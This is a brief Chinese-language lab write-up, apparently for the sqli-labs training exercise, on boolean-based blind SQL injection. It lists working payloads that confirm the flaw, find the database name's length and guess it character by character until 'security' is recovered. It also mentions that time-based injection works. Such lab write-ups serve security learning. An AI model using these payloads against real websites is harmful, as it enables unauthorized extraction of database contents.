题目名字暴露一切,本来不想看的,又瞥到了,布尔型盲注,单引号,id=1回显,价格单引号不回显,构造一下验证是不是布尔型payload ?id=1' and 1=1 --+ 回显了,证明没跑了。
那就一步一步来吧,和less5一样的,根据回显判断。
可以通过 > < 比较字符大小加速爆破
暴库payload
?id=1' and left((select database()),1)='s'--+
库名长度可使用?id=1' and length(database())=8--+ 判断,同理表名字,段名等。
最后得到库名?id=1' and left((select database()),8)='security'--+
爆表,爆字段,爆值,流水操作,和less5的方法二,手工注入所有payload一摸一样。
less5的方法二,时间型的注入一样能用,
但是不知道为什么concat聚合函数这题用不了。
注入完成。